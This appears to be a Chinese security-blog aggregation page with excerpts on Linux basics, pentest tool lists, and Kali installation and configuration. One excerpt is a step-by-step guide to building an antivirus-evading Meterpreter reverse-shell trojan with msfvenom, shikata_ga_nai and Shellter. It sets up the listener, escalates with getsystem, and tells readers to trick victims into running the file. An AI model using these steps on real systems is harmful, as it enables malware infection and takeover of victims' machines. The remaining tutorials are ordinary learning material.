【网安基础】网安打工人必须掌握的四个Linux知识点 安全闲碎

【网安基础】网安打工人必须掌握的四个Linux知识点

网安教育培养网络安全人才技术交流、学习咨询学习网络安全就一定离不开学习Linux,在Linux的的众多版本中,kali Linux集成了众多渗透测试工具于一体,成为了网安学习、突破必备的东西。什么?你学网安怎么还没有安好kali?速速点击Kali linux安装步骤,史上最详细的步骤,傻瓜式教学1Linux系统目录结构 1/bin 存放普通用户能够运行的命令 2/sbin 管理员可以执行的命令 3/boot 存放操作系统启动、引导配置文件 4/dev 存放存储文件的、硬盘等 5/etc 系统和应用服务配置文件 6/home 普通用户的家目录,相当于windows用户文件 7/lib 存放函数库文件 8/media 挂载光盘等存储介质的目录 9/mnt 同上10/opt 用来安装大型程序11/proc 开机生成的配置文件,谁开机生成的进程、配置文件12/root 超级用户的家目录13/sys 存放系统配置文件14/usr 安装一些外部程序15/var 日志、临时文件等2Linux基本命令命令是Linux系统的灵魂,学习Linux就要先学习他的基本灵魂。需要特别注意的是,Linux系统是对大小写敏感的。(区别于windows系统,win系统是大小写不敏感的)Linux命令的分类内置shell命令和外部命令-内部命令:属于shell解释器的一部分(自带的)-外部命令:独立于shell解释器之外的程序文件(安装程序需要的命令)Linux通用命令格式命令字+选项+参数选项及参数的含义1.选项:用于命令调节的具体功能2.以 “-” 引导短格式选项(单个字符),如 “-l”3.以 “-” 引导长格式选项(多个字符),如 “-color”4.多个短格式选项可以写在一起,只用一个“-”引导,例如“-al”参数:命令操作的对象,如文件、目录名等例如:ls -l /home,执行命令后如下:命令行编辑的几个常用的辅助操作1-Tab:自动补齐2-快捷键Ctrl+U:清空至行首3-快捷键Ctrl+K:清空至行尾4-快捷键Ctrl+L:清屏5-快捷键Ctrl+C:取消本次命令编辑6-使用PageUp和PageDown翻页7-按Q退出阅读环境8-按“/”键后查找内容自己实际操作几下,很快就能上手了,熟练运用快捷键可以加快你的工作效率。常用的Linux命令学命令的时候一定要边学变动手亲自操作一遍,只用眼睛看是没有效果的uname命令该命令可以查看系统相关信息1常用命令选项2-a 显示主机名、内核版本、硬件平台等详细信息3-r 显示内核版本hostname命令可以查看主机名ifconfig命令可以查看ip地址信息等whoami命令查看当前有效用户名cat命令查看文件命令,例如:1//该命令可以查看proc下的cpuinfo文件2cat /proc/cpuinfo1//合并文件1、2到文件32cat 1 2 > 31//给所有行加上行号2cat -n关机、重启命令reboot 重启命令poweroff、halt 关机命令ls命令用法:ls … …列出给定文件(默认为当前目录)的信息。如果不指定 -cftuvSUX 中任意一个或–sort 选项,则根据字母大小排序。1常用选项2-l 以长格式显示3-A 显示所有子目录文件的信息,包括隐藏文件4-a 类似与“-A”命令,但显示“.”、“…”目录的信息5-d 显示目录本身的属性6-h 以更易读的字节单位显示信息7-R 递归显示内容8–color 以颜色区分不同类型文件du命令统计目录及文件的空间占用情况常用选项1常用选项2-a 统计时包括所有的文件,而不仅仅只统计目录3-s 只统计每个参数所占用空间总的大小touch命令新建空文件,或更新文件时间标记mkdir命令1创建目录 mkdir  dirName实例:1mkdir test2#在工作目录下,建立一个名为 test 的子目录mkdir -p test2/test#在工作目录下的test2 目录中,建立一个名为 test 的子目录。#若 test2 目录原本不存在,则建立一个。#注:本例若不加 -p 参数,且原本 test2 目录不存在,则产生错误。1mkdir -p test2/test2#在工作目录下的test2 目录中,建立一个名为 test 的子目录。3#若 test2 目录原本不存在,则建立一个。4#注:本例若不加 -p 参数,且原本 test2 目录不存在,则产生错误。mv命令移动文件或目录(如果目标位置与原位置相同,则相当于改名)vi命令1-r用于恢复系统突然崩溃时正在编辑的文件2  -R以只读的方式打开文件3+n 用来指明进入vi后直接位于第n行,不指定n则位于最后一行 如:vi +5 f1命令模式1dd 删除当前光标所在的整行 删除多行2dd、3dd2p 粘贴刚刚删除的3u 返回上次编辑编辑模式1a 可以进行编译2i 在光标前插入3I 在行首插入4o 在光标的下一行插入5O 在光标的上一行插入底行模式1:q 退出2:q! 强制退出3:wq 保存退出4:wq! 强制保存退出wc命令统计单词数量、字节数、行数1 -l 统计行数2 -w 统计单词数gzip命令压缩命令gzip -d 解压缩bzip2 压缩命令,与gzip相似tar归档命令-cvf创建归档添加用户账号1 useradd -m test -g sudo -s /bin/bash -d /home/testest新建一个用户的登入目录为test (用户名)权限为sudo用户组用户登录后使用的shell为 /bin/bush指定用户登入时的起始目录为/home/testest用户查看和删除查看用户 cat /etc/passwd 在最下面删除用户 userdel -r testln命令为文件或目录创建链接可选择创建软连接和硬链接(下面详细介绍)3Linux软链接与硬链接硬链接硬链接是通过索引节点进行的链接。在Linux中,多个文件指向同一个索引节点是允许的,像这样的链接就是硬链接。硬链接只能在同一文件系统中的文件之间进行链接,不能对目录进行创建。如果删除硬链接对应的源文件,则硬链接文件仍然存在,而且保存了原有的内容,这样可以起到防止因为误操作而错误删除文件的作用。由于硬链接是有着相同 inode 号仅文件名不同的文件,因此,删除一个硬链接文件并不影响其他有相同 inode 号的文件。硬链接由ln命令创建1 ln f1 f2创建一个文件f2,他与f1是硬链接软链接软链接(也叫符号链接)与硬链接不同,文件用户数据块中存放的内容是另一文件的路径名的指向。软链接就是一个普通文件,只是数据块内容有点特殊。软链接可对文件或目录创建。软链接主要应用于以下两个方面:一是方便管理,例如可以把一个复杂路径下的文件链接到一个简单路径下方便用户访问;另一方面就是解决文件系统磁盘空间不足的情况。例如某个文件文件系统空间已经用完了,但是现在必须在该文件系统下创建一个新的目录并存储大量的文件,那么可以把另一个剩余空间较多的文件系统中的目录链接到该文件系统中,这样就可以很好的解决空间不足问题。删除软链接并不影响被指向的文件,但若被指向的原文件被删除,则相关软连接就变成了死链接。使用-s选项的ln命令即可创建符号链接,命令如下:1 ln -s f1 f3软链接与硬链接的实验找一个或自己新建一个空文件夹,在里面新建一个空文件f11 touch f1再使用ln命令创建一个文件f2与f1硬链接1 ln f1 f2最后使用ln命令创建一个f3与f1符号链接1 ln -s f1 f3然后我们使用ls命令查看这些文件的详情信息1 ls -li从下方的详情里可以看到,文件f1和f2的inode是相同的,而f3与f1的inode不一样。我们尝试向f1内写入一些数据,查看这三个文件的变化。1 echo 123456 >> f12#echo命令可以向文件内写入数据这里向f1内写入了一串数字123456,再次使用cat命令分别查看这些文件的内容。可以发现,只写入一个文件,其余两个文件都会发生改变。如果我对初始文件f1做删除操作会发生什么呢?当删除文件f1后,f2仍然可以查看,但是文件f3则提示“没有在那个文件或目录”到这里,大家应该可以理解软链接与硬链接了吧4Linux rwx权限使用ls查看文件时,发现每个文件前面都有这样一串英文前三位表示为拥有者user的权限,中间三位为所需组group的权限,最后三位为其他非本群组others的权限当rwx作用于文件1 r代表可读(read):可以读取,查看2w代表可写(write):可以修改,但是不能删除该文件3x代表可执行(execute):可以被执行当rwx作用于目录1 r代表可读(read):可以读取,ls查看目录内容2w代表可写(write):可以修改,目录内创建、删除、重命名目录3x代表可执行(execute):可以进入该目录45r=4;w=2;x=167rwxr-xr-x →rwx r-x r -x →7558rwxrwx—→rwx rwx — →770可以通过chmod命令修改权限例如:chmod 770 rwx的具体学习,可以参考一张图让你搞定linux中权限中rwx的意思,和linux rwx权限的解读。结束零零散散总结的这些东西,希望可以在你网络安全学习中起到帮助。版权声明:本文为CSDN博主「LinAime」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。原文链接:https://blog.csdn.net/LinAime/article/details/118901548 版权声明:著作权归作者所有。如有侵权请联系删除开源聚合网安训练营战疫期间,开源聚合网络安全基础班、实战班线上全面开启,学网络安全技术、升职加薪……有兴趣的可以加入开源聚合网安大家庭,一起学习、一起成长,考证书求职加分、升级加薪,有兴趣的可以咨询客服小姐姐哦!加QQ(1005989737)找小姐姐私聊哦精选文章环境搭建Python学员专辑信息收集CNVD安全求职渗透实战CVE高薪揭秘渗透测试工具网络安全行业神秘大礼包基础教程我们贴心备至用户答疑 QQ在线客服加入社群QQ+微信等着你我就知道你“在看” 本文始发于微信公众号(开源聚合网络空间安全研究院):【网安基础】网安打工人必须掌握的四个Linux知识点
阅读全文
专业人士必备的10个渗透测试工具 安全工具

专业人士必备的10个渗透测试工具

渗透测试,也被称为穿透测试或道德黑客攻击,就像电影《Sneakers》中那样,黑客顾问在攻击者之前侵入你的公司网络,找出弱点。这是一个模拟的网络攻击,pentester使用恶意黑客可用的工具和技术。在之前,黑客攻击是很难的,需要大量的手工操作。然而,今天一套完整的自动化测试工具将黑客变成了半机械人,和以往相比,他们可以进行更多的测试。下面是一些渗透测试工具的列表,它们可以使pentester的工作更快、更好、更智能。1. Kali Linux如果您没有使用Kali作为基本的pentest操作系统,那么您要么拥有最前沿的知识和专门的用例,要么就做错了。Kali的前身是BackTrack Linux,由进攻性安全部门的专业人员维护,它在各个方面都进行了优化,可以作为进攻性渗透测试器使用。虽然您可以在自己的硬件上运行Kali,但是在OS X或Windows上看到pentester使用Kali虚拟机要常见得多。Kali附带了此处提到的大多数工具,是大多数用例的默认测试操作系统。不过要注意,Kali最擅长进攻,而不是防守,而且很容易被利用。不要在你的Kali虚拟机中保存你的重要机密文件。2. Nmap作为端口扫描器的鼻祖,nmap (network mapper)是一种久经考验的测试工具,很少有人能离开它。哪些端口是开放的?那些端口上运行着什么?这是pentester在测试阶段必不可少的信息,nmap通常是这项工作的最佳工具。尽管偶尔会有不懂技术的高管歇斯底里地表示,某个未知方正在对企业进行端口扫描,但nmap本身是完全合法的,就像敲邻居的前门,看看是否有人在家一样。许多合法的组织,如保险公司、Shodan和Censys这样的互联网制图师,以及BitSight这样的风险评分者,都会定期使用专门的端口扫描软件(通常是nmap的竞争对手masscan或zmap)扫描整个IPv4范围,以绘制大大小小企业的公共安全态势。也就是说,恶意的攻击者也会进行端口扫描,所以需要进行日志记录,以便将来参考。3. Metasploit对于大多数的测试者而言,Metasploit自动化了大量以前繁琐的工作,并且真正成为“世界上最常用的渗透测试框架”,正如它的网站所鼓吹的那样。Metasploit是一个由Rapid7提供商业支持的开源项目,对于防御者来说,它是保护他们的系统免受攻击的必备工具。4. WiresharkWireshark是一种无处不在的工具,用于理解通过网络传输的流量。虽然Wireshark通常用于深入研究日常TCP/IP连接问题,但它支持对数百个协议的分析,包括对其中许多协议的实时分析和解密支持。如果您是测试新手,Wireshark是一个必须学习的工具。5. John the Ripper与同名软件(开膛手约翰)不同的是,John不会在维多利亚时代的伦敦连续杀人,而是会以GPU最快的速度破解加密。这个密码破解程序是开源的,用于离线密码破解。John可以使用一组可能的密码,并对它们进行变更,将“a”替换为“@”,将“s”替换为“5”,以此类推。或者它可以使用强大的硬件无限次运行,直到找到密码为止。考虑到绝大多数人使用的是简单的短密码,John通常能成功破解加密。6. Hydra当您需要在线破解密码时,John的伙伴Hydra就会发挥作用,比如SSH或FTP登录、IMAP、IRC、RDP等。把Hydra指向你想要破解的服务,如果你愿意,可以给它一个密码列表,然后开始破解。诸如Hydra之类的工具会提醒我们,为什么限制密码尝试的次数,以及在少量登录尝试后断开用户连接可以成功减轻攻击者的防御能力。7. Burp Suite任何关于pentest工具的讨论都必须提到web漏洞扫描器Burp Suite,与目前提到的其他工具不同,它不是免费的,而是专业人员使用的昂贵工具。虽然有一个Burp Suite社区版,但它缺少很多功能,而Burp Suite企业版的售价高达每年3999美元。不过,他们能以如此高的价格让大家使用也是有原因的。Burp Suite是一个非常有效的web漏洞扫描器。将它指向要测试的web属性,并在准备好时启动。Burp的竞争对手Nessus也提供了同样有效(且价格相似)的产品。8. Zed Attack Proxy那些没有钱购买Burp Suite副本的人会发现OWASP的Zed攻击代理(ZAP)几乎同样有效,而且它是免费的软件。顾名思义,ZAP位于浏览器和测试网站之间,允许您拦截(也就是中间人)流量来检查和修改。它缺乏Burp的许多花哨功能,但它的开源许可使其更容易、更便宜地大规模部署,而且它是一个很好的初学者工具,可以让他们了解web流量到底有多脆弱。ZAP的竞争对手Nikto也提供了类似的开源工具。9. Sqlmap有人说有SQL注入工具吗?可以试一下Sqlmap。这个非常有效的SQL注入工具是开源的,“自动检测和利用SQL注入缺陷并接管数据库服务器的过程,”就像它的网站上说的那样。Sqlmap支持所有常见的目标,包括MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、Informix、HSQLDB和H2。过去,老用户必须用热针在硬盘上精心设计SQL注入。如今,Sqlmap将使您的pentest任务不再是眯着眼的工作。10. aircrack-ng你的客户或者你家里的wifi到底有多安全?用aircrack-ng找出答案。这个wifi安全审计工具是免费的,但Pringles你必须自己获得(我们听说7-11的暗网市场可以给你一个低点)。由于配置不当、密码错误或加密协议过时,使得如今破解wifi常常是可能的。Aircrack-ng是许多人的首选——不管有没有Pringles的“cantenna”。 本文始发于微信公众号(疯猫网络):专业人士必备的10个渗透测试工具
阅读全文
黑客和安全专业人员最重要的网络渗透测试工具 安全工具

黑客和安全专业人员最重要的网络渗透测试工具

扫描/渗透测试· OpenVAS – OpenVAS是一个包含多种服务和工具的框架,可提供全面而强大的漏洞扫描和漏洞管理解决方案。· Metasploit Framework – 针对远程目标计算机开发和执行漏洞攻击代码的最佳网络安全工具之一。其他重要的子项目包括操作码数据库、shellcode档案和相关研究。· Kali – Kali Linux是基于Debian的Linux发行版,设计用于数字取证操作系统。每一季度更新一次。Kali Linux预装了许多渗透测试程序,包括nmap(端口扫描器)、Wireshark(数据包分析器)、John the Ripper(密码破解程序)和Aircrack-ng(用于渗透测试无线LAN的软件套件)。· pig – Linux数据包制作工具。· scapy – Scapy:基于 python 的交互式数据包操作程序和库。· Pompem – Pompem是一种开源网络安全工具,旨在自动搜索主要数据库中的漏洞。用Python开发,具有高级搜索系统,从而促进渗透测试者和道德黑客的工作。在其当前版本中,在数据库中执行搜索:Exploit-db、1337day、Packetstorm Security...· Nmap – Nmap是一款开源免费的网络发现(Network Discovery)和安全审计(Security Auditing)工具。软件名字Nmap是Network Mapper的简称。监控/记录· justniffer – Justniffer是一种网络协议分析器,它可以捕获网络流量并以自定义方式生成日志,可以模拟Apache Web服务器日志文件,跟踪响应时间并从HTTP流量中提取所有“拦截”文件。· httpry – httpry是一个专门的数据包嗅探器,用于显示和记录HTTP流量。它的目的不是执行分析本身,而是捕获、解析和记录流量,以便以后进行分析。它可以在解析流量时实时显示流量,也可以作为记录到输出文件的守护进程运行。它被编写得尽可能轻量级和灵活,以便轻松适应不同的应用程序。· ngrep – ngrep致力于提供GNU grep的大部分通用功能,并将其应用于网络层。ngrep是一个pcap-aware工具,它允许你指定扩展的正则或十六进制表达式来匹配数据包的数据payload。它目前通过以太网、PPP、SLIP、FDDI、令牌环和空接口识别IPv4/6、TCP、UDP、ICMPv4/6、IGMP和Raw,并以与更常见的数据包嗅探工具(如tcpdump和snoop)相同的方式理解BPF过滤器逻辑。· Passivedns – 被动收集DNS记录的最佳网络安全工具之一,可帮助事件处理、网络安全监控(NSM)和一般数字取证。PassiveDNS嗅探来自接口的流量或读取pcap文件,并将DNS服务器响应输出到日志文件。PassiveDNS可以在内存中缓存/聚合重复的DNS应答,从而限制日志文件中的数据量,而不会丢失DNS应答中的essens。· sagan – Sagan使用“类似Snort”的引擎和规则来分析日志(系统日志/事件日志/snmptrap/netflow等)。· Node Security Platform – 与Snyk类似的功能集,但在大多数情况下是免费的。· ntopng – Ntopng是一个网络流量探测器,显示网络使用情况,类似于流行的top Unix命令。· Fibratus – Fibratus是一种用于探索和跟踪Windows内核的工具。它能够捕获大部分Windows内核活动——进程/线程创建和终止、文件系统I/O、注册表、网络活动、DLL加载/卸载等等。Fibratus有一个非常简单的CLI,它封装了启动内核事件流收集器、设置内核事件过滤器或运行轻量级Python模块(称为fills)的机制。IDS / IPS / 主机 IDS / 主机 IPS· Snort – Snort是Martin Roesch于1998年创建的免费开源网络入侵防御系统(NIPS)和网络入侵检测系统(NIDS)。Snort现在由Sourcefire开发,其中Roesch是其创始人兼CTO。2009年,Snort作为“有史以来最伟大的开源软件”之一进入了InfoWorld的开源名人堂。· Bro – Bro是一个强大的网络分析框架,与您可能知道的典型IDS有很大不同。· OSSEC – 全面的开源HIDS。您可能需要一点时间来了解它的工作原理。执行日志分析、文件完整性检查、策略监控、rootkit检测、实时警报和主动响应。它可以在大多数操作系统上运行,包括Linux、MacOS、Solaris、HP-UX、AIX和Windows。最擅长大中型部署。· Suricata – Suricata是一个高性能的网络IDS、IPS和网络安全监控引擎。它由社区运营的非营利基金会所有,即开放信息安全基金会(OISF)。Suricata由OISF及其支持供应商开发。· Security Onion – Security Onion是一个Linux发行版,用于入侵检测、网络安全监控和日志管理。它基于Ubuntu,包含Snort、Suricata、Bro、OSSEC、Sguil、Squet、Snorby、ELSA、Xplico、NetworkMiner和许多其他安全工具。易于使用的设置向导可让您在几分钟内为您的企业构建大量分布式传感器!· sshwatch – SSH的IP类似于用Python编写的DenyHost。它还可以在日志中收集攻击过程中攻击者的信息。· Stealth – 文件完整性检查工具。控制器在另一台机器上运行,这使得攻击者很难知道文件系统正在通过SSH以定义的伪随机间隔进行检查。强烈推荐用于中小型部署。· AIEngine – AIEngine是下一代交互式/可编程Python/Ruby/Java/Lua数据包检查引擎,具有无需任何人工干预的学习能力、NIDS(网络入侵检测系统)功能、DNS域分类、网络收集器、网络取证等其他。· Denyhosts – 阻止基于SSH字典的攻击和蛮力攻击。·...
阅读全文
kali学习笔记之更新问题与中文输入法安装 安全闲碎

kali学习笔记之更新问题与中文输入法安装

        kali linux是基于Debian的linux发行版,设计用于数字取证操作系统。相信各位安全从业人员对于这款系统一定很熟悉了,今天开始跟大家分享学习使用kali系统的过程。        kali系统的安装方法在网上有一大堆,大部分写的都是在虚拟机中安装,在这里我们也不过多进行赘述,如果有想在物理机中安装kali系统的小伙伴,遇到问题可以扫描文章后面的二维码,加群一起讨论学习。        今天先跟大家分享一下kali系统安装完成之后的更新问题与常用软件的安装问题,大家都知道,在安装完系统之后,系统中的部分软件并不是最新版的,因此我们要对系统进行更新,接下来就跟大家一起学习系统更新的技巧。        有的师傅们分享的更新方法是去官网上下载最新的镜像或者是最新的压缩包,解压或重新在虚拟机中安装就可以了,这里我们分享常见的更新三板斧:sudo apt update         更新软件源中软件列表sudo apt upgrade        更新软件sudo apt dist-upgrade   更新系统版本        基本上用到的命令就是这三个,但是在使用命令之前我们还要修改一点东西,修改/etc/apt/sources.list这个文件中的内容。 sudo vim /etc/apt/sources.list        这里我选择的是将这个文件中的内容全部注释掉,然后在/etc/apt/sources.list.d/这个目录下新创建一个关于更新源的文件。cd /etc/apt/sources.list.dsudo vim aliyun.list在其中输入deb http://mirrors.aliyun.com/kali kali-rolling main non-free contribdeb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib         这样便将阿里云的源设置完成了,下面是常用的更新源,大家可以根据自己的爱好来设置更新源,这里还会牵扯到一个问题,下面跟大家分享。#中科大deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contribdeb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib#阿里云deb http://mirrors.aliyun.com/kali kali-rolling main non-free contribdeb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib#清华大学deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-freedeb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free#浙大 deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-freedeb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free        前几天在更新的时候碰到了这样一个问题,接下来跟大家分享我的解决方法。        这里我们看到提示说暂时无法解析两个源,我们看到一个是清华大学的源,还有一个是docker的源。我们先去查看/etc/apt/sources.list.d这个目录下的文件,因为考虑的docker可以暂时不用更新,便将docker文件中的内容全部注释掉。         修改完成之后我们发现依然无法更新,出现提示没有Release文件,出现这样提示的大概率原因是因为很久没有更新系统导致出现的问题,这种情况下可以更换源来进行解决。        解决完源的问题后便可以进行更新了。温馨提示,kali的更新是比较频繁的,记得及时更新你的kali系统哟。        更新完系统之后,kali系统便可以正常使用了,接下来就要安装中文输入法了,这里我们推荐搜狗输入法linux版跟百度输入法linux版,当然也有其他输入法,这里不进行一一赘述。        我们选择下载任意一个输入法,这里我们安装以及设置搜狗输入法,其他输入法的安装配置基本类似。我们先点击下载,将搜狗拼音的deb包下载下来,下载完成后使用sudo dpkg -i sougoupinyin_2.4.0.3469_amd.deb命令来安装,第一次安装可能会有很多依赖没有安装,会遇到下面这样的错误,这时候可以使用sudo apt -f install来修复缺失的依赖。         出现这样的提示就代表我们的搜狗输入法成功安装了,此时我们在桌面上仍然未看到搜狗输入法的痕迹,接下来我们配置一下fcitx这个东西。        在终端中输入im-config        这里选择是,我们进行手工指定。        这里选择fcitx,启用小企鹅输入法,确定就可以了。然后我们注销或者重启一下系统,就能看到已经安装好的搜狗输入法了!        目前已经有很多软件都已经适配了linux系统,接下来会慢慢跟大家一起分享微信、qq、WPS、百度网盘、网易云音乐等等软件的安装,请大家持续关注哦!        欢迎加群一起交流学习网络安全中遇到的问题! 本文始发于微信公众号(LSCteam):kali学习笔记之更新问题与中文输入法安装
阅读全文
msf反弹木马之免杀 安全文章

msf反弹木马之免杀

原理利用msf模块中的msfvenom模块,首先生成.exe木马文件,用靶机打开,攻击成功后,就渗透到了靶机系统中。准备win7靶机 ip :192.168.56.130kali攻击机 ip: 192.168.56.135##实战开始1.打开kali机,在命令行输入:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.135 lport=1234 -e x86/shikata_ga_nai -i 5 -f exe >/home/kali/Desktop/1.exeLHOST是主机的ip,用来“提醒”木马成功后应该返回信息给自己的主机。lport是返回时连接的端口号,需要开启tcp功能,1234端口好像默认开启?> 后面的那一串表示木马生成的对应地址,为了方便操作我直接生成在桌面上。-e x86/shikata_ga_nai 为使用shikata_ga_nai的编码方式对攻击载荷进行重新编码-i 5为使用刚才设定的编码方式对目标进行5次编码2.命令行输入shellter第一个选项选择A3.PE Target 后面填写/home/kali/Desktop/1.exe,即木马所在路径。然后等待一段时间······注意,虽然看着不动,但是上面那个数字一直在跳,所以不是你卡住了~4.然后选择Y5.选择L,payload index 选择16.设置LHOST以及LPORT等个大概2秒钟,就结束了~免杀木马制作完成。命令行输入msfconsole进入metasploit。然后输入use exploit/multi/handler开启监听模式接下来就是设置参数了,可以使用option命令来查看需要设置的参数。主要设置三个:payload、LHOST、LPORT,需要跟木马一样,复制一下就行set payload windows/meterpreter/reverse_tcpset lhost 192.168.56.135set lport 1234这里大小写随意,都可以被识别。随后输入exploit执行监听命令,也就是攻击开始~kali端操作结束!然后利用社会工程学等方式诱骗其他人点击这玩意,就被攻击了。现在假装win7被骗了,无意中点了我的反弹木马:然后输入shell就可以获取对方管理员权限。在输入shell之前,输入getsystem,获得system权限以后,再输入shell就可以获得最高权限啦~使用echo %username%可以输出使用者的名字,这里是SJX-PC$,如果是管理员的话,只会显示管理员账号(我这里是“sjx”),而且,看前面的内容也可以知道是system权限:CSDN博主「imbia」原文链接:https://blog.csdn.net/satasun/article/details/105441604---》推荐公众号:    每日分享红蓝队技术文章与工具使用 下载方式、以及不定期的安全类书籍抽奖~ 本文始发于微信公众号(LemonSec):msf反弹木马之免杀
阅读全文
渗透利器—kali安全指导 安全闲碎

渗透利器—kali安全指导

0x01:准备1.kali镜像(kali.org官网下载即可)2.VM虚拟机3.电脑一台(= = )0x02:开始!打开虚拟机,点击创建新的虚拟机接下来直接按照官方操作走下去(当然,如果你比较熟悉就自定义),版本可以选择Ubuntu开启虚拟机,进行安装kali,选择Graphical install安装模式    选择中文简体,接下来按照操作走输入你的主机名字,我们就直接输入kali,你喜欢其他的也可以,接下来一样,按照操作走,域名那里可以不填写直接下一步如图所示,直接接着走接下来便是开始安装了,耐心等待数个小时(开玩笑的啦,最多也就半个小时)选择否,不然又要接着下载咯 == ,最后便开始了最后的安装点击继续,然后便是真正的最后安装了输入你们的密码,开始你的kali之旅吧 本文始发于微信公众号(零组攻防实验室):渗透利器—kali安全指导
阅读全文
Kali 2.0 VMware安装常见问题 安全博客

Kali 2.0 VMware安装常见问题

刚刚又重装了一遍Kali2.0的虚拟机,发现如果设置有点偏差就容易出问题。不过最后还是顺利装上了。首先,在创建虚拟机的时候,我选择的是Other Linux 3.x X64。接下来的硬盘大小我设置的是30G。核心数看自己的电脑情况而定,我的是4核心。网络就是NAT。显示器里面,可以开启3D加速图形。大致这样设置就可以了。 接下来,到安装阶段。第一个容易出问题的点在磁盘分区:这里,如果你选的不是那个新手推荐的默认的话,很可能会有一个问题就是: 你的/root分区不够10G! 因为Kali是Debian的一个衍生版(貌似),所以/root一定要在10G以上(也许是这样)。如果不了解的话,还是老老实实选新手推荐吧。 系统安装好之后,要安装VMware Tools不是?安装前,我们先要安装Kali2.0的Linux内核文件: apt-get install linux-header-$(uname -r) 安装完之后,再安装VMware Tools。至于肿么安装,1)在虚拟机软件的管理里面选择安装VMware Tools2)不出意外的话,Kali里面会显示有一个CD3)打开CD,将里面的tar文件拷到home目录下4)进终端,用命令tar -zvxf VM*解压5)解压完成后,进入解压出来的目录:cd vm*6)输入./vmware-install.pl*7)最后一路按回车即可8)安装完成后reboot一下就行了 FROM :rickyhao.com | rickyhao.com相关推荐: DDCTF-WEB&MISC-WRITE-UPDDCTF-WEB&MISC-WRITE-UP MISC 0X01.签到题 flag在公告里面,赛前一天我就知道了23333333…   0X02.(╯°□°)╯︵ ┻━┻ 题目: d4e8e1f4a0f7e1f3a0e6e1f3…
阅读全文
关于kali联不上网的一些解决方法 安全博客

关于kali联不上网的一些解决方法

今天打开vmware里的kali时突然发现联不上网了,搞了好一会儿才弄好,这里写个文章总结一下。(net模式可能出现的不能联网的问题) 第一种情况 首先ifconfig,可以看到没有正在工作的网卡,只有localhost 然后ifconfig -a,可以看到eth0这块网卡并没有离家出走,只是罢工了而已 接下来是关键步骤 leafpad /etc/network/interfaces 起初是没有最下面两行的,加上,格式是仿造倒数第三和第四这两行来写的 最后,在terminal里执行 /etc/init.d/networking restart   重启网络,使刚才的配置生效,done。 第二种情况 网络适配器不显示。(如图) 正常的应该是 试试ifconfig -a 发现网卡没问题。然后就不知道哪出问题了,重启网络重启系统很多次都没有用。 后来一个老哥告诉我,vmware可以重置虚拟网络。 参考链接:https://jingyan.baidu.com/article/3c343ff7e366820d3679637f.html 重置完之后发现网络适配器显示未托管。 解决办法: leafpad /etc/NetworkManager/NetworkManager.conf 把最后一行的managed=false改为managed=true。 保存重启即可。     参考链接:https://blog.csdn.net/chenyanhui1087/article/details/53127884 参考链接:http://www.eehello.com/?post=88  
阅读全文
投稿文章:如何拥有移动渗透系统,手把手教你安装手机kali 安全文章

投稿文章:如何拥有移动渗透系统,手把手教你安装手机kali

现在安卓手机早就普及了,基本人手一台,而对于我们这些喜欢搞安全的人来说有时突发灵感可是要渗透测试又离不开kali虚拟机,所以当我们手机也可以变成一台kali渗透系统那是多好的事!!T^T虽然kali官方发布了专门为安卓手机定制的kali渗透系统。。那么问题来了,现在安卓手机硬件五花八门,他的系统只能有那么几个个别手机可以用。。所以骚年们,像我等穷屌丝还是回归现实比较实在╭( ̄▽ ̄)╮,直接安装大神们改造的kali系统=_=————————屌丝变大神分割线————————一、背景Kali Linux 前身是 BackTrack(基于ubuntu),是一个基于 Debian 的 Linux 发行版,包含很多安全和取证方面的相关工具。支持 ARM架构。二、kali功能Kali Linux预装了许多渗透测试软件,包括nmap (端口扫描器)、Wireshark (数据包分析器)、John the Ripper (密码破解器),以及Aircrack-ng (一套用于对无线局域网进行渗透测试的软件)等软件。三、准备工具①安卓手机一台(配置自己看着办)②需要用到的软件:    linux Deploy、AndroidVNC、 jiuceshh③修改后的kali镜像(后面给出下载地址)④手机root,储存空间要大。⑤安装安卓神器busybox四、安装过程1、打开linux Deploy,进入设置把语言改成中文,当然如果你英语很好可以忽略2、点击箭头符号,按照图片样子设置注意:哪里有一个下面有一个镜像大小可以随意设置,50mb最好3、修改分辨率如图(请根据自己手机的分辨率修改,这里需要注意,由于是横屏使用所以Width的值要和Height的值互换)4、点击安装5、到文件管理器把/storage/emulated/0/目录下的linux.img删除,把下载的linux.img 移动到/storage/emulated/0/6、打开linux Deploy点击停止再点启动,如下图:看到ssh和vnc后面为deom则启动成功7、现在可以用这两个连接器连接了!把密码告诉大家:VNC ip:127.0.0.1    port:5900    password:changemeSHH  ip:127.0.0.1    port:22   user:android    password:changeme———————猥琐的分割线———————这个时候你可以用vnc连接器链接下 看看我们可爱的kali界面~_~打包下载链接:https://pan.baidu.com/s/1jIjYP74密码:v72b下面配上几个图片 本文始发于微信公众号(T00ls):投稿文章:如何拥有移动渗透系统,手把手教你安装手机kali
阅读全文
【技术篇】利用渗透工具kali linux进行wifi钓鱼 安全文章

【技术篇】利用渗透工具kali linux进行wifi钓鱼

